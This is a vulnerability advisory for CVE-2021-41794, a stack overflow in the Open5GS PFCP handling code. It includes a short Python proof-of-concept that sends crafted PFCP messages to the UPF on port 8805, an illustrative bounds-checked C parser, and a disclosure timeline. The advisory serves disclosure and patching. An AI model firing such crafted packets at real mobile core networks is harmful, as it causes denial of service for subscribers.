Vendor: Open5GS
Vendor URL: https://github.com/open5gs/open5gs
Versions affected: 1.0.0 to 2.3.3
Systems Affected: Linux
Author: mark.tedman[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2021-41794
Risk: CVSSv3.1: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Summary
When connecting to the UPF port for the PFCP protocol (8805) and sending an Association Setup Request followed by a Session Establishment Request with a PDI Network Instance set to ‘internet’, a stack corruption occurs.
Impact
Exploitation of this vulnerability would lead to denial of service for the subscriber’s equipment.
Details
Sending a PFCP Association Setup followed by a PFCP Session Establishment Request with the settings detailed below is enough to cause the stack overflow. The issue is caused by the function ogs_fqdn_parse in the file lib/core/ogs-3gpp-types.c calculating a length value used in a memcpy without validating it.
Directly affected files:
- Function: ogs_fqdn_parse in /lib/core/ogs-3gpp-types.c
- /lib/nas/5gs/ies.c
- /lib/nas/eps/ies.c
- /lib/pfcp/handler.c
- /lib/pfcp/types.c
- /lib/sbi/nnrf-handler.c
- /src/mme/sgsap-handler.c
- /src/sgwc/s11-handler.c
- /src/smf/context.c
The following Python script can be used to replicate the issue:
#!/usr/bin/env python3
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(1.0)

# PFCP Association Setup Request (message type 5, length 26)
pfcp_association_setup_req = b'\x20\x05\x00\x1a\x00\x00\x01\x00\x00\x3c\x00\x05\x00\xc0\xa8\x3f\x88\x00\x60\x00\x04\x5f\xf4\x38\x25\x00\x59\x00\x01\x00'
# PFCP Session Establishment Request with the PDI Network Instance set to 'internet'
pfcp_session_establishment_req = b'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'

# Associate with the UPF first; the session request is only processed afterwards
sock.sendto(pfcp_association_setup_req, ('127.0.0.7', 8805))
try:
    sock.recv(65535)
except Exception as ex:
    print(f"Receive failed: {ex}")

sock.sendto(pfcp_session_establishment_req, ('127.0.0.7', 8805))
try:
    sock.recv(65535)
except Exception as ex:
    print(f"Receive failed: {ex}")

sock.close()
Recommendation
The function ogs_fqdn_parse needs to correctly calculate/validate the length used in the memcpy function. This has been patched as of October 6th 2021 (fix committed to main branch of Open5GS and released in version 2.3.4).
Users should update to the most recent version 2.3.4 or above of Open5GS.
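The following C function illustrates the kind of validation the recommendation calls for. It is an added example written for this advisory, not Open5GS code and not the project's actual patch. It parses a Network Instance / FQDN value encoded as length-prefixed labels (for example "\x08internet") into a dotted name, and checks every label length against both the remaining input and the remaining destination capacity before the memcpy. The test vectors are constructed: when the raw ASCII string "internet" is fed in without a length prefix, the first octet 'i' (0x69) is read as a label length of 105 although only 8 octets are present, and the checked parser rejects it instead of copying. The function and vector names are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical hardened FQDN/DNN parser (added example, not Open5GS code).
 * Input: a sequence of length-prefixed labels, e.g. "\x08internet" or
 * "\x03abc\x02de". Output: the dotted name ("internet", "abc.de").
 * Returns the number of characters written (excluding the NUL), or -1
 * when a label length runs past the end of src or the result would not
 * fit in dst. Both checks happen before any memcpy.
 */
int fqdn_parse_checked(char *dst, size_t dst_size,
                       const uint8_t *src, size_t src_len)
{
    size_t i = 0, j = 0;

    if (dst == NULL || dst_size == 0 || src == NULL)
        return -1;

    while (i < src_len) {
        size_t len = src[i++];          /* label length octet */

        /* The label must lie entirely inside the remaining input. */
        if (len == 0 || len > src_len - i)
            return -1;
        /* It must also leave room in dst for a '.' or the final NUL. */
        if (len + 1 > dst_size - j)
            return -1;

        memcpy(&dst[j], &src[i], len);  /* bounded on both sides */
        i += len;
        j += len;

        if (i < src_len)
            dst[j++] = '.';
    }
    dst[j] = '\0';
    return (int)j;
}

/* Constructed test vectors (not captured traffic). */
static const uint8_t ENCODED_INTERNET[] = { 8, 'i','n','t','e','r','n','e','t' };
/* Raw ASCII "internet" with no length prefix: 'i' (0x69) would be read as a
 * label length of 105, far beyond the 8 octets actually present. */
static const uint8_t RAW_INTERNET[] = { 'i','n','t','e','r','n','e','t' };
static const uint8_t TWO_LABELS[] = { 3, 'a','b','c', 2, 'd','e' };

char g_out[64];   /* shared output buffer so callers need not declare one */

int parse_encoded_internet(void)
{
    return fqdn_parse_checked(g_out, sizeof g_out,
                              ENCODED_INTERNET, sizeof ENCODED_INTERNET);
}

int parse_raw_internet(void)
{
    return fqdn_parse_checked(g_out, sizeof g_out,
                              RAW_INTERNET, sizeof RAW_INTERNET);
}

int parse_two_labels(void)
{
    return fqdn_parse_checked(g_out, sizeof g_out,
                              TWO_LABELS, sizeof TWO_LABELS);
}

/* Same valid input, but a destination too small for "abc.de" plus NUL. */
int parse_two_labels_small_dst(void)
{
    char small[4];
    return fqdn_parse_checked(small, sizeof small,
                              TWO_LABELS, sizeof TWO_LABELS);
}

int main(void)
{
    printf("encoded 'internet'  -> %d (%s)\n", parse_encoded_internet(), g_out);
    printf("raw 'internet'      -> %d (rejected)\n", parse_raw_internet());
    printf("two labels          -> %d (%s)\n", parse_two_labels(), g_out);
    printf("two labels, 4B dst  -> %d (rejected)\n", parse_two_labels_small_dst());
    return 0;
}
```

The two checks inside the loop are the whole point: an unchecked length octet taken from the wire is exactly the value that, in the unpatched function, sizes the memcpy. Checking it against the bytes actually received stops the over-read of src, and checking it against the destination capacity stops the stack buffer overflow the advisory describes.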
Vendor Communication
29/09/2021: Initial email sent to Open5GS
29/09/2021: Open5GS replied with PGP Key
30/09/2021: Sent Technical Advisory to Open5GS
30/09/2021: Technical Advisory received by Open5GS
01/10/2021: Bug fixed by Open5GS
06/10/2021: Open5GS version 2.3.4 released - fixes bug
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Published date: 06/10/2021
Written by: Mark Tedman